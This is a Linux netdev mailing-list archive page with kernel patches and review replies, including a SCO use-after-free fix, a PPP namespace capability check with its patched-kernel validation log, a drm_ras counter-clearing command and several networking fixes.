Netdev List
 help / color / mirror / Atom feed
* [PATCH RESEND net-next 2/2] KEYS: annotate struct user_key_payload with __counted_by
From: Thorsten Blum @ 2026-04-09  7:37 UTC (permalink / raw)
  To: David Howells, Jarkko Sakkinen, Kees Cook, Gustavo A. R. Silva
  Cc: Thorsten Blum, netdev, keyrings, linux-kernel, linux-hardening
In-Reply-To: <20260409073711.57020-4-thorsten.blum@linux.dev>

Add the __counted_by() compiler attribute to the flexible array member
'data' to improve access bounds-checking via CONFIG_UBSAN_BOUNDS and
CONFIG_FORTIFY_SOURCE.

Signed-off-by: Thorsten Blum <thorsten.blum@linux.dev>
---
Resending this because patch 2/2 didn't go to netdev@ (Jakub)
Cc: netdev@vger.kernel.org
---
 include/keys/user-type.h | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/include/keys/user-type.h b/include/keys/user-type.h
index 386c31432789..2305991f4fcd 100644
--- a/include/keys/user-type.h
+++ b/include/keys/user-type.h
@@ -27,7 +27,8 @@
 struct user_key_payload {
 	struct rcu_head	rcu;		/* RCU destructor */
 	unsigned short	datalen;	/* length of this data */
-	char		data[] __aligned(__alignof__(u64)); /* actual data */
+	char		data[]		/* actual data */
+			__aligned(__alignof__(u64)) __counted_by(datalen);
 };
 
 extern struct key_type key_type_user;

^ permalink raw reply related

* [PATCH RESEND net-next 1/2] keys, dns: drop unused upayload->data NUL terminator
From: Thorsten Blum @ 2026-04-09  7:37 UTC (permalink / raw)
  To: David S. Miller, Eric Dumazet, Jakub Kicinski, Paolo Abeni,
	Simon Horman, Tim Bird, Thorsten Blum
  Cc: netdev, linux-kernel

In dns_resolver_preparse(), do not NUL-terminate ->data and allocate one
byte less. The NUL terminator is never used and only ->datalen bytes are
accessed.

Signed-off-by: Thorsten Blum <thorsten.blum@linux.dev>
---
Resending this because patch 2/2 didn't go to netdev@ (Jakub)
Cc: netdev@vger.kernel.org
---
 net/dns_resolver/dns_key.c | 3 +--
 1 file changed, 1 insertion(+), 2 deletions(-)

diff --git a/net/dns_resolver/dns_key.c b/net/dns_resolver/dns_key.c
index c3c8c3240ef9..451247864a63 100644
--- a/net/dns_resolver/dns_key.c
+++ b/net/dns_resolver/dns_key.c
@@ -203,7 +203,7 @@ dns_resolver_preparse(struct key_preparsed_payload *prep)
 	kdebug("store result");
 	prep->quotalen = result_len;
 
-	upayload = kmalloc_flex(*upayload, data, result_len + 1);
+	upayload = kmalloc_flex(*upayload, data, result_len);
 	if (!upayload) {
 		kleave(" = -ENOMEM");
 		return -ENOMEM;
@@ -211,7 +211,6 @@ dns_resolver_preparse(struct key_preparsed_payload *prep)
 
 	upayload->datalen = result_len;
 	memcpy(upayload->data, data, result_len);
-	upayload->data[result_len] = '\0';
 
 	prep->payload.data[dns_key_data] = upayload;
 	kleave(" = 0");

^ permalink raw reply related

* Re: [PATCH net v2] net_sched: fix skb memory leak in deferred qdisc drops
From: Eric Dumazet @ 2026-04-09  7:37 UTC (permalink / raw)
  To: Fernando Fernandez Mancera
  Cc: netdev, horms, pabeni, kuba, davem, Damilola Bello
In-Reply-To: <20260408100044.4530-1-fmancera@suse.de>

On Wed, Apr 8, 2026 at 3:01 AM Fernando Fernandez Mancera
<fmancera@suse.de> wrote:
>
> When the network stack cleans up the deferred list via qdisc_run_end(),
> it operates on the root qdisc. If the root qdisc do not implement the
> TCQ_F_DEQUEUE_DROPS flag the packets queue to free are never freed and
> gets stranded on the child's local to_free list.
>
> Fix this by making qdisc_dequeue_drop() aware of the root qdisc. It
> fetches the root qdisc and check for the TCQ_F_DEQUEUE_DROPS flag. If
> the flag is present, the packet is appended directly to the root's
> to_free list. Otherwise, drop it directly as it was done before the
> optimization was implemented.
>
> Fixes: a6efc273ab82 ("net_sched: use qdisc_dequeue_drop() in cake, codel, fq_codel")
> Reported-by: Damilola Bello <damilola@aterlo.com>
> Closes: https://lore.kernel.org/netdev/CAPgFtOLaedBMU0f_BxV2bXftTJSmJr018Q5uozOo5vVo6b9tjw@mail.gmail.com/
> Signed-off-by: Fernando Fernandez Mancera <fmancera@suse.de>
> ---

Reviewed-by: Eric Dumazet <edumazet@google.com>

Thanks !

^ permalink raw reply

* Re: [PATCH net-next v9 00/10] net: phy_port: SFP modules representation and phy_port listing
From: Paolo Abeni @ 2026-04-09  7:35 UTC (permalink / raw)
  To: Maxime Chevallier, davem, Andrew Lunn, Jakub Kicinski,
	Eric Dumazet, Russell King, Heiner Kallweit
  Cc: netdev, linux-kernel, thomas.petazzoni, Christophe Leroy,
	Herve Codina, Florian Fainelli, Vladimir Oltean,
	Köry Maincent, Marek Behún, Oleksij Rempel,
	Nicolò Veronese, Simon Horman, mwojtas, Romain Gantois,
	Daniel Golle, Dimitri Fedrau
In-Reply-To: <20260403123755.175742-1-maxime.chevallier@bootlin.com>

On 4/3/26 2:37 PM, Maxime Chevallier wrote:
> Hello everyone,
> 
> Here's V9 for the phy_port netlink interface (get-only for now).
> 
> V9 addresses sashiko's issues (not all of them, as some don't make
> sense), and updates the missings parts in the doc.
> 
> This work extends on the recent addition of phy_port representation to enable
> listing the front-facing ports of an interface. For now, we don't control
> these ports, we merely list their presence and their capabilities.
> 
> As the most common use-case of multi-port interfaces is combo-ports that
> provide both RJ45 and SFP connectors on a single MAC, there's a lot of
> SFP stuff in this series.
> 
> This series is in 2 main parts. The first one aims at representing the
> SFP cages and modules using phy_port, as combo-ports with RJ45 + SFP are
> by far the most common cases for multi-connector setups.
> 
> The second part is the netlink interface to list those ports, now that
> most use-cases are covered.
> 
> Let's see what we can do with some examples of the new ethtool API :
> 
> - Get MII interfaces supported by an empty SFP cage :
> 
> # ethtool --show-ports eth3
> 
> Port for eth3:
> 	Port id: 1
> 	Vacant: yes
> 	Supported MII interfaces : sgmii, 1000base-x, 2500base-x
> 	Port type: sfp
> 
> - Get Combo-ports supported modes, on each port :
> 
> # ethtool --show-ports eth1
> 
> Port for eth1:
> 	Port id: 1
> 	Vacant: no
> 	Supported link modes:  10baseT/Half 10baseT/Full
> 	                       100baseT/Half 100baseT/Full
> 	                       1000baseT/Full
> 	                       10000baseT/Full
> 	                       2500baseT/Full
> 	                       5000baseT/Full
> 
> 	Port type: mdi
> 
> Port for eth1:
> 	Port id: 2
> 	Vacant: yes
> 	Supported MII interfaces : 10gbase-r
> 	Port type: sfp
> 
> - Get Achievable linkmodes on a SFP module (combo port with a DAC in the
> SFP cage)
> 
> # ethtool --show-ports eth1
> 
> Port for eth1:
> 	Port id: 1
> 	Vacant: no
> 	Supported link modes:  10baseT/Half 10baseT/Full
> 	                       100baseT/Half 100baseT/Full
> 	                       1000baseT/Full
> 	                       10000baseT/Full
> 	                       2500baseT/Full
> 	                       5000baseT/Full
> 	Port type: mdi
> 
> Port for eth1:
> 	Port id: 2
> 	Vacant: no
> 	Supported MII interfaces : 10gbase-r
> 	Port type: sfp
> 
> Port for eth1:
> 	Port id: 3
> 	Vacant: no
> 	Supported link modes:  10000baseCR/Full
> 	Port type: mdi
> 
> Note that here, we have 3 ports :
>  - The Copper port
>  - The SFP Cage itself, marked as 'occupied'
>  - The SFP module
> 
> This series builds on top of phy_port and phy_link_topology to allow
> tracking the ports of an interface. We maintain a list of supported
> linkmodes/interfaces on each port, which allows for fine-grained
> reporting of each port's capability.
> 
> What this series doesn't do :
>  - We don't support selecting which port is active. This is the next step.
>  - We only support PHY-driven combo ports. The end-goal of this whole
>    journey that started with phy_link_topology is to get support for MII
>    muxes, such as the one we have on the Turris Omnia. This will eventually
>    be upstreamed as well.
> 
> If you want to play around with it, here's [1] the patched ethtool that I've
> been using to produce the outputs above.
> 
> Thanks !
> 
> Maxime
> 
> [1] : https://github.com/minimaxwell/ethtool/tree/mc/ethtool_port

Some feedback from Andrew, Russell or Heiner would be very appreciated.

@Maxime: I went over sashiko feedback and I *think* it ranges from
orthogonal to wrong, but it would be useful if you could go over it.

Thanks,

Paolo


^ permalink raw reply

* Re: [RFC net-next 2/4] selftests: drv-net: tso: add helpers for double tunneling GSO
From: Xu Du @ 2026-04-09  7:35 UTC (permalink / raw)
  To: Jakub Kicinski
  Cc: davem, edumazet, pabeni, horms, shuah, netdev, linux-kselftest,
	linux-kernel
In-Reply-To: <20260408172741.39e65ab3@kernel.org>

On Thu, Apr 9, 2026 at 8:27 AM Jakub Kicinski <kuba@kernel.org> wrote:
>
> On Wed, 8 Apr 2026 10:04:09 +0800 Xu Du wrote:
> > On Tue, Apr 7, 2026 at 11:08 PM Jakub Kicinski <kuba@kernel.org> wrote:
> > >
> > > On Tue,  7 Apr 2026 10:45:09 +0800 Xu Du wrote:
> > > > As the YNL Python module cannot be invoked across different devices or
> > > > environments directly in its current form, the helper abstracts the
> > > > YNL CLI calls to ensure proper configuration of the tunneling device
> > > > features.
> > >
> > > Can you explain more? Why can't you use class RtnlFamily?
> >
> > I want to test the gro-hint parameter functionality of the GENEVE tunnel,
> > so I intend to use YNL for the testing. I am conducting the test between
> > two machines using SSH type. I want to add the gro-hint parameter on
> > both the local and remote nodes; however, I am unable to invoke class
> > RtnlFamily on the remote node via SSH.
>
> Oh. But that's not really what you're doing:
>
> +def ynlcli(family, args, json=None, ns=None, host=None):
> +    if (KSFT_DIR / "kselftest-list.txt").exists():
> +        cli = KSFT_DIR / "net/lib/ynl/pyynl/cli.py"
> +        spec = KSFT_DIR / f"net/lib/specs/{family}.yaml"
> +    else:
> +        cli = KSRC / "tools/net/ynl/pyynl/cli.py"
> +        spec = KSRC / f"Documentation/netlink/specs/{family}.yaml"
> +    if not cli.exists():
> +        raise FileNotFoundError(f"cli not found at {cli}")
> +    args = f"--spec {spec} --no-schema {args}"
> +    return tool(cli.as_posix(), args, json=json, ns=ns, host=host, shell=True)
>
> You're not deploying anything to the remote system.
> Are you assuming that the remote system magically has the same
> filesystem layout?
>
> You can use the ynl CLI but it has to be whatever version is on
> the remote system. Just call ynl --family rt-link, don't dig
> around for the spec paths etc.
>

In fact, I have tested this from two different locations. The first is in
tools/testing/selftests/drivers/net/hw/ using python3 tso.py,
which utilizes the specs located in Documentation/netlink/specs/.
The second follows the testing methodology described in the
README.rst of tools/testing/selftests/drivers/net/, which uses the specs
in net/lib/specs/. Based on this, I include that different processes utilize
different spec locations.
I also referred to the implementation in net/lib/py/ynl.py, which employs
a similar handling logic. Both using the source code repository and
installing the package can meet the requirements for remote testing.

-- 

Regards,

Xu


^ permalink raw reply

* [PATCH 5.15.y] Bluetooth: SCO: Fix use-after-free in sco_recv_frame() due to missing sock_hold
From: Jianqiang kang @ 2026-04-09  7:26 UTC (permalink / raw)
  To: gregkh, stable, imv4bel
  Cc: patches, linux-kernel, marcel, johan.hedberg, luiz.dentz, davem,
	kuba, linux-bluetooth, netdev, luiz.von.dentz

From: Hyunwoo Kim <imv4bel@gmail.com>

[ Upstream commit 598dbba9919c5e36c54fe1709b557d64120cb94b ]

sco_recv_frame() reads conn->sk under sco_conn_lock() but immediately
releases the lock without holding a reference to the socket. A concurrent
close() can free the socket between the lock release and the subsequent
sk->sk_state access, resulting in a use-after-free.

Other functions in the same file (sco_sock_timeout(), sco_conn_del())
correctly use sco_sock_hold() to safely hold a reference under the lock.

Fix by using sco_sock_hold() to take a reference before releasing the
lock, and adding sock_put() on all exit paths.

Fixes: 1da177e4c3f4 ("Linux-2.6.12-rc2")
Signed-off-by: Hyunwoo Kim <imv4bel@gmail.com>
Signed-off-by: Luiz Augusto von Dentz <luiz.von.dentz@intel.com>
Signed-off-by: Jianqiang kang <jianqkang@sina.cn>
---
 net/bluetooth/sco.c | 10 +++++++---
 1 file changed, 7 insertions(+), 3 deletions(-)

diff --git a/net/bluetooth/sco.c b/net/bluetooth/sco.c
index d98648bcc1a8..d0ef74c45914 100644
--- a/net/bluetooth/sco.c
+++ b/net/bluetooth/sco.c
@@ -311,7 +311,7 @@ static void sco_recv_frame(struct sco_conn *conn, struct sk_buff *skb)
 	struct sock *sk;
 
 	sco_conn_lock(conn);
-	sk = conn->sk;
+	sk = sco_sock_hold(conn);
 	sco_conn_unlock(conn);
 
 	if (!sk)
@@ -320,11 +320,15 @@ static void sco_recv_frame(struct sco_conn *conn, struct sk_buff *skb)
 	BT_DBG("sk %p len %u", sk, skb->len);
 
 	if (sk->sk_state != BT_CONNECTED)
-		goto drop;
+		goto drop_put;
 
-	if (!sock_queue_rcv_skb(sk, skb))
+	if (!sock_queue_rcv_skb(sk, skb)) {
+		sock_put(sk);
 		return;
+	}
 
+drop_put:
+	sock_put(sk);
 drop:
 	kfree_skb(skb);
 }
-- 
2.34.1


^ permalink raw reply related

* Re: [PATCH v2 1/2] drm/drm_ras: Add clear-error-counter netlink command to drm_ras
From: Tauro, Riana @ 2026-04-09  7:21 UTC (permalink / raw)
  To: intel-xe, dri-devel, netdev, rodrigo.vivi, Zack McKevitt,
	joonas.lahtinen, aravind.iddamsetty
  Cc: anshuman.gupta, simona.vetter, airlied, pratik.bari,
	joshua.santosh.ranjan, ashwin.kumar.kulkarni, shubham.kumar,
	ravi.kishore.koppuravuri, raag.jadav, anvesh.bakwad,
	maarten.lankhorst, Jakub Kicinski, Lijo Lazar, Hawking Zhang,
	David S. Miller, Paolo Abeni, Eric Dumazet
In-Reply-To: <20260409073318.2909379-5-riana.tauro@intel.com>

Hi Zack

Could you please take a look at this patch if applicable to your 
usecase. Please let me know if any
changes are required

@Rodrigo This is already reviewed by Jakub and Raag.
If there are no opens, can this be merged via drm_misc

Thanks
Riana

On 4/9/2026 1:03 PM, Riana Tauro wrote:
> Introduce a new 'clear-error-counter' drm_ras command to reset the counter
> value for a specific error counter of a given node.
>
> The command is a 'do' netlink request with 'node-id' and 'error-id'
> as parameters with no response payload.
>
> Usage:
>
> $ sudo ynl --family drm_ras  --do clear-error-counter --json \
> '{"node-id":1, "error-id":1}'
> None
>
> Cc: Jakub Kicinski <kuba@kernel.org>
> Cc: Zack McKevitt <zachary.mckevitt@oss.qualcomm.com>
> Cc: Lijo Lazar <lijo.lazar@amd.com>
> Cc: Hawking Zhang <Hawking.Zhang@amd.com>
> Cc: David S. Miller <davem@davemloft.net>
> Cc: Paolo Abeni <pabeni@redhat.com>
> Cc: Eric Dumazet <edumazet@google.com>
> Signed-off-by: Riana Tauro <riana.tauro@intel.com>
> Reviewed-by: Jakub Kicinski <kuba@kernel.org>
> Reviewed-by: Raag Jadav <raag.jadav@intel.com>
> ---
>   Documentation/gpu/drm-ras.rst            |  8 +++++
>   Documentation/netlink/specs/drm_ras.yaml | 13 ++++++-
>   drivers/gpu/drm/drm_ras.c                | 43 +++++++++++++++++++++++-
>   drivers/gpu/drm/drm_ras_nl.c             | 13 +++++++
>   drivers/gpu/drm/drm_ras_nl.h             |  2 ++
>   include/drm/drm_ras.h                    | 11 ++++++
>   include/uapi/drm/drm_ras.h               |  1 +
>   7 files changed, 89 insertions(+), 2 deletions(-)
>
> diff --git a/Documentation/gpu/drm-ras.rst b/Documentation/gpu/drm-ras.rst
> index 70b246a78fc8..4636e68f5678 100644
> --- a/Documentation/gpu/drm-ras.rst
> +++ b/Documentation/gpu/drm-ras.rst
> @@ -52,6 +52,8 @@ User space tools can:
>     as a parameter.
>   * Query specific error counter values with the ``get-error-counter`` command, using both
>     ``node-id`` and ``error-id`` as parameters.
> +* Clear specific error counters with the ``clear-error-counter`` command, using both
> +  ``node-id`` and ``error-id`` as parameters.
>   
>   YAML-based Interface
>   --------------------
> @@ -101,3 +103,9 @@ Example: Query an error counter for a given node
>       sudo ynl --family drm_ras --do get-error-counter --json '{"node-id":0, "error-id":1}'
>       {'error-id': 1, 'error-name': 'error_name1', 'error-value': 0}
>   
> +Example: Clear an error counter for a given node
> +
> +.. code-block:: bash
> +
> +    sudo ynl --family drm_ras --do clear-error-counter --json '{"node-id":0, "error-id":1}'
> +    None
> diff --git a/Documentation/netlink/specs/drm_ras.yaml b/Documentation/netlink/specs/drm_ras.yaml
> index 79af25dac3c5..e113056f8c01 100644
> --- a/Documentation/netlink/specs/drm_ras.yaml
> +++ b/Documentation/netlink/specs/drm_ras.yaml
> @@ -99,7 +99,7 @@ operations:
>         flags: [admin-perm]
>         do:
>           request:
> -          attributes:
> +          attributes: &id-attrs
>               - node-id
>               - error-id
>           reply:
> @@ -113,3 +113,14 @@ operations:
>               - node-id
>           reply:
>             attributes: *errorinfo
> +    -
> +      name: clear-error-counter
> +      doc: >-
> +           Clear error counter for a given node.
> +           The request includes the error-id and node-id of the
> +           counter to be cleared.
> +      attribute-set: error-counter-attrs
> +      flags: [admin-perm]
> +      do:
> +        request:
> +          attributes: *id-attrs
> diff --git a/drivers/gpu/drm/drm_ras.c b/drivers/gpu/drm/drm_ras.c
> index b2fa5ab86d87..d6eab29a1394 100644
> --- a/drivers/gpu/drm/drm_ras.c
> +++ b/drivers/gpu/drm/drm_ras.c
> @@ -26,7 +26,7 @@
>    * efficient lookup by ID. Nodes can be registered or unregistered
>    * dynamically at runtime.
>    *
> - * A Generic Netlink family `drm_ras` exposes two main operations to
> + * A Generic Netlink family `drm_ras` exposes the below operations to
>    * userspace:
>    *
>    * 1. LIST_NODES: Dump all currently registered RAS nodes.
> @@ -37,6 +37,10 @@
>    *    Returns all counters of a node if only Node ID is provided or specific
>    *    error counters.
>    *
> + * 3. CLEAR_ERROR_COUNTER: Clear error counter of a given node.
> + *    Userspace must provide Node ID, Error ID.
> + *    Clears specific error counter of a node if supported.
> + *
>    * Node registration:
>    *
>    * - drm_ras_node_register(): Registers a new node and assigns
> @@ -66,6 +70,8 @@
>    *   operation, fetching all counters from a specific node.
>    * - drm_ras_nl_get_error_counter_doit(): Implements the GET_ERROR_COUNTER doit
>    *   operation, fetching a counter value from a specific node.
> + * - drm_ras_nl_clear_error_counter_doit(): Implements the CLEAR_ERROR_COUNTER doit
> + *   operation, clearing a counter value from a specific node.
>    */
>   
>   static DEFINE_XARRAY_ALLOC(drm_ras_xa);
> @@ -314,6 +320,41 @@ int drm_ras_nl_get_error_counter_doit(struct sk_buff *skb,
>   	return doit_reply_value(info, node_id, error_id);
>   }
>   
> +/**
> + * drm_ras_nl_clear_error_counter_doit() - Clear an error counter of a node
> + * @skb: Netlink message buffer
> + * @info: Generic Netlink info containing attributes of the request
> + *
> + * Extracts the node ID and error ID from the netlink attributes and
> + * clears the current value.
> + *
> + * Return: 0 on success, or negative errno on failure.
> + */
> +int drm_ras_nl_clear_error_counter_doit(struct sk_buff *skb,
> +					struct genl_info *info)
> +{
> +	struct drm_ras_node *node;
> +	u32 node_id, error_id;
> +
> +	if (!info->attrs ||
> +	    GENL_REQ_ATTR_CHECK(info, DRM_RAS_A_ERROR_COUNTER_ATTRS_NODE_ID) ||
> +	    GENL_REQ_ATTR_CHECK(info, DRM_RAS_A_ERROR_COUNTER_ATTRS_ERROR_ID))
> +		return -EINVAL;
> +
> +	node_id = nla_get_u32(info->attrs[DRM_RAS_A_ERROR_COUNTER_ATTRS_NODE_ID]);
> +	error_id = nla_get_u32(info->attrs[DRM_RAS_A_ERROR_COUNTER_ATTRS_ERROR_ID]);
> +
> +	node = xa_load(&drm_ras_xa, node_id);
> +	if (!node || !node->clear_error_counter)
> +		return -ENOENT;
> +
> +	if (error_id < node->error_counter_range.first ||
> +	    error_id > node->error_counter_range.last)
> +		return -EINVAL;
> +
> +	return node->clear_error_counter(node, error_id);
> +}
> +
>   /**
>    * drm_ras_node_register() - Register a new RAS node
>    * @node: Node structure to register
> diff --git a/drivers/gpu/drm/drm_ras_nl.c b/drivers/gpu/drm/drm_ras_nl.c
> index 16803d0c4a44..dea1c1b2494e 100644
> --- a/drivers/gpu/drm/drm_ras_nl.c
> +++ b/drivers/gpu/drm/drm_ras_nl.c
> @@ -22,6 +22,12 @@ static const struct nla_policy drm_ras_get_error_counter_dump_nl_policy[DRM_RAS_
>   	[DRM_RAS_A_ERROR_COUNTER_ATTRS_NODE_ID] = { .type = NLA_U32, },
>   };
>   
> +/* DRM_RAS_CMD_CLEAR_ERROR_COUNTER - do */
> +static const struct nla_policy drm_ras_clear_error_counter_nl_policy[DRM_RAS_A_ERROR_COUNTER_ATTRS_ERROR_ID + 1] = {
> +	[DRM_RAS_A_ERROR_COUNTER_ATTRS_NODE_ID] = { .type = NLA_U32, },
> +	[DRM_RAS_A_ERROR_COUNTER_ATTRS_ERROR_ID] = { .type = NLA_U32, },
> +};
> +
>   /* Ops table for drm_ras */
>   static const struct genl_split_ops drm_ras_nl_ops[] = {
>   	{
> @@ -43,6 +49,13 @@ static const struct genl_split_ops drm_ras_nl_ops[] = {
>   		.maxattr	= DRM_RAS_A_ERROR_COUNTER_ATTRS_NODE_ID,
>   		.flags		= GENL_ADMIN_PERM | GENL_CMD_CAP_DUMP,
>   	},
> +	{
> +		.cmd		= DRM_RAS_CMD_CLEAR_ERROR_COUNTER,
> +		.doit		= drm_ras_nl_clear_error_counter_doit,
> +		.policy		= drm_ras_clear_error_counter_nl_policy,
> +		.maxattr	= DRM_RAS_A_ERROR_COUNTER_ATTRS_ERROR_ID,
> +		.flags		= GENL_ADMIN_PERM | GENL_CMD_CAP_DO,
> +	},
>   };
>   
>   struct genl_family drm_ras_nl_family __ro_after_init = {
> diff --git a/drivers/gpu/drm/drm_ras_nl.h b/drivers/gpu/drm/drm_ras_nl.h
> index 06ccd9342773..a398643572a5 100644
> --- a/drivers/gpu/drm/drm_ras_nl.h
> +++ b/drivers/gpu/drm/drm_ras_nl.h
> @@ -18,6 +18,8 @@ int drm_ras_nl_get_error_counter_doit(struct sk_buff *skb,
>   				      struct genl_info *info);
>   int drm_ras_nl_get_error_counter_dumpit(struct sk_buff *skb,
>   					struct netlink_callback *cb);
> +int drm_ras_nl_clear_error_counter_doit(struct sk_buff *skb,
> +					struct genl_info *info);
>   
>   extern struct genl_family drm_ras_nl_family;
>   
> diff --git a/include/drm/drm_ras.h b/include/drm/drm_ras.h
> index 5d50209e51db..f2a787bc4f64 100644
> --- a/include/drm/drm_ras.h
> +++ b/include/drm/drm_ras.h
> @@ -58,6 +58,17 @@ struct drm_ras_node {
>   	int (*query_error_counter)(struct drm_ras_node *node, u32 error_id,
>   				   const char **name, u32 *val);
>   
> +	/**
> +	 * @clear_error_counter:
> +	 *
> +	 * This callback is used by drm_ras to clear a specific error counter.
> +	 * Driver should implement this callback to support clearing error counters
> +	 * of a node.
> +	 *
> +	 * Returns: 0 on success, negative error code on failure.
> +	 */
> +	int (*clear_error_counter)(struct drm_ras_node *node, u32 error_id);
> +
>   	/** @priv: Driver private data */
>   	void *priv;
>   };
> diff --git a/include/uapi/drm/drm_ras.h b/include/uapi/drm/drm_ras.h
> index 5f40fa5b869d..218a3ee86805 100644
> --- a/include/uapi/drm/drm_ras.h
> +++ b/include/uapi/drm/drm_ras.h
> @@ -41,6 +41,7 @@ enum {
>   enum {
>   	DRM_RAS_CMD_LIST_NODES = 1,
>   	DRM_RAS_CMD_GET_ERROR_COUNTER,
> +	DRM_RAS_CMD_CLEAR_ERROR_COUNTER,
>   
>   	__DRM_RAS_CMD_MAX,
>   	DRM_RAS_CMD_MAX = (__DRM_RAS_CMD_MAX - 1)

^ permalink raw reply

* Re: [PATCH net] net: fix __this_cpu_add() in preemptible code in dev_xmit_recursion_inc/dec
From: Eric Dumazet @ 2026-04-09  7:18 UTC (permalink / raw)
  To: Jiayuan Chen
  Cc: netdev, David S. Miller, Jakub Kicinski, Paolo Abeni,
	Simon Horman, Andrew Lunn, Sebastian Andrzej Siewior,
	Clark Williams, Steven Rostedt, Weiming Shi, linux-kernel,
	linux-rt-devel
In-Reply-To: <20260409035344.214279-1-jiayuan.chen@linux.dev>

On Wed, Apr 8, 2026 at 8:54 PM Jiayuan Chen <jiayuan.chen@linux.dev> wrote:
>
> dev_xmit_recursion_inc/dec() use __this_cpu_inc/dec() which requires
> migration to be disabled. However, some callers like SCTP's UDP
> encapsulation path invoke iptunnel_xmit() from process context without
> disabling BH or preemption:
>
>   sctp_inet_connect -> __sctp_connect -> sctp_do_sm ->
>   sctp_outq_flush -> sctp_packet_transmit -> sctp_v4_xmit ->
>   udp_tunnel_xmit_skb -> iptunnel_xmit -> dev_xmit_recursion_inc
>
> This triggers the following warning on PREEMPT(full) kernels:
>
>
> Fix this by adding migrate_disable/enable() around the __this_cpu
> operations in dev_xmit_recursion_inc/dec() to ensure the per-cpu
> variable is accessed on the same CPU throughout the inc/dec pair.
>
> Fixes: 6f1a9140ecda ("net: add xmit recursion limit to tunnel xmit functions")
> Signed-off-by: Jiayuan Chen <jiayuan.chen@linux.dev>
> ---
>  include/linux/netdevice.h | 5 +++++
>  1 file changed, 5 insertions(+)
>
> diff --git a/include/linux/netdevice.h b/include/linux/netdevice.h
> index 7ca01eb3f7d2..6b1cd5380d70 100644
> --- a/include/linux/netdevice.h
> +++ b/include/linux/netdevice.h
> @@ -3591,14 +3591,19 @@ static inline bool dev_xmit_recursion(void)
>                         XMIT_RECURSION_LIMIT);
>  }
>
> +/* Non PREEMPT_RT version: inc and dec must run on the same CPU,
> + * migrate_disable is sufficient.
> + */
>  static inline void dev_xmit_recursion_inc(void)
>  {
> +       migrate_disable();
>         __this_cpu_inc(softnet_data.xmit.recursion);
>  }
>
>  static inline void dev_xmit_recursion_dec(void)
>  {
>         __this_cpu_dec(softnet_data.xmit.recursion);
> +       migrate_enable();
>  }
>  #else
>  static inline int dev_recursion_level(void)
> --
> 2.43.0

This seems wrong.

The migrate_disable() should happen before dev_recursion_level().

^ permalink raw reply

* Re: [PATCH net v3] ppp: require CAP_NET_ADMIN in target netns for unattached ioctls
From: 하태구 @ 2026-04-09  7:18 UTC (permalink / raw)
  To: Andrew Lunn, David S. Miller, Eric Dumazet, Jakub Kicinski,
	Paolo Abeni, Qingfang Deng, Kees Cook, Taegu Ha,
	Kuniyuki Iwashima, Sebastian Andrzej Siewior, Cyrill Gorcunov,
	linux-ppp, netdev, linux-kernel
  Cc: qingfang.deng, gnault, jaco, richardbgobert, ericwouds,
	teknoraver
In-Reply-To: <20260409071117.4354-1-hataegu0826@gmail.com>

[-- Attachment #1: Type: text/plain, Size: 2749 bytes --]

Hello,

Yes, I have a QEMU-based PoC and validation log for the current patch.

The reproducer starts as an unprivileged uid, verifies that open("/dev/ppp")
fails before CLONE_NEWUSER, then creates only a new user namespace while
keeping the same network namespace, and finally attempts PPPIOCNEWUNIT.

With the current patch applied, the original userns-only inherited-netns path
is blocked as expected. In the same network namespace, open("/dev/ppp") still
succeeds after CLONE_NEWUSER, but PPPIOCNEWUNIT now fails with EPERM.

Relevant log lines from my current QEMU run:

    [*] initial netns ino=4026531833
    [*] dropped to uid=65534 gid=65534 before userns
    [*] open(/dev/ppp) before userns failed as expected: Operation not permitted
    [*] after userns-only unshare netns ino=4026531833
    [*] now uid=0 gid=65534 in new userns
    [*] open(/dev/ppp) after userns succeeded
    ioctl(PPPIOCNEWUNIT): Operation not permitted

I am attaching:
- the minimal guest reproducer used in QEMU
- the guest serial log from the current patched run

Thanks,
Taegu Ha
hataegu0826@gmail.com

2026년 4월 9일 (목) 오후 4:12, Taegu Ha <hataegu0826@gmail.com>님이 작성:
>
> /dev/ppp open is currently authorized against file->f_cred->user_ns,
> while unattached administrative ioctls operate on current->nsproxy->net_ns.
>
> As a result, a local unprivileged user can create a new user namespace
> with CLONE_NEWUSER, gain CAP_NET_ADMIN only in that new user namespace,
> and still issue PPPIOCNEWUNIT, PPPIOCATTACH, or PPPIOCATTCHAN against
> an inherited network namespace.
>
> Require CAP_NET_ADMIN in the user namespace that owns the target network
> namespace before handling unattached PPP administrative ioctls.
>
> This preserves normal pppd operation in the network namespace it is
> actually privileged in, while rejecting the userns-only inherited-netns
> case.
>
> Fixes: 273ec51dd7ce ("net: ppp_generic - introduce net-namespace functionality v2")
> Signed-off-by: Taegu Ha <hataegu0826@gmail.com>
> ---
>  drivers/net/ppp/ppp_generic.c | 3 +++
>  1 file changed, 3 insertions(+)
>
> diff --git a/drivers/net/ppp/ppp_generic.c b/drivers/net/ppp/ppp_generic.c
> index e9b41777be80..c2024684b10d 100644
> --- a/drivers/net/ppp/ppp_generic.c
> +++ b/drivers/net/ppp/ppp_generic.c
> @@ -1057,6 +1057,9 @@ static int ppp_unattached_ioctl(struct net *net, struct ppp_file *pf,
>         struct ppp_net *pn;
>         int __user *p = (int __user *)arg;
>
> +       if (!ns_capable(net->user_ns, CAP_NET_ADMIN))
> +               return -EPERM;
> +
>         switch (cmd) {
>         case PPPIOCNEWUNIT:
>                 /* Create a new ppp unit */
> --
> 2.43.0
>

[-- Attachment #2: ppp_v3_validation.log --]
[-- Type: application/octet-stream, Size: 25420 bytes --]

[    0.000000] Linux version 7.0.0-rc6-00005-g48278fa03093-dirty (root@dbdd95a60758) (gcc (Ubuntu 13.3.0-6ubuntu2~24.04.1) 13.3.0, GNU ld (GNU Binutils for Ubuntu) 2.42) #3 SMP PREEMPT_DYNAMIC Thu Apr  9 15:57:17 KST 2026
[    0.000000] Command line: console=ttyS0 rdinit=/init panic=-1
[    0.000000] BIOS-provided physical RAM map:
[    0.000000] BIOS-e820: [mem 0x0000000000000000-0x000000000009fbff]  System RAM
[    0.000000] BIOS-e820: [mem 0x000000000009fc00-0x000000000009ffff]  device reserved
[    0.000000] BIOS-e820: [gap 0x00000000000a0000-0x00000000000effff]
[    0.000000] BIOS-e820: [mem 0x00000000000f0000-0x00000000000fffff]  device reserved
[    0.000000] BIOS-e820: [mem 0x0000000000100000-0x000000003ffdffff]  System RAM
[    0.000000] BIOS-e820: [mem 0x000000003ffe0000-0x000000003fffffff]  device reserved
[    0.000000] BIOS-e820: [gap 0x0000000040000000-0x00000000fffbffff]
[    0.000000] BIOS-e820: [mem 0x00000000fffc0000-0x00000000ffffffff]  device reserved
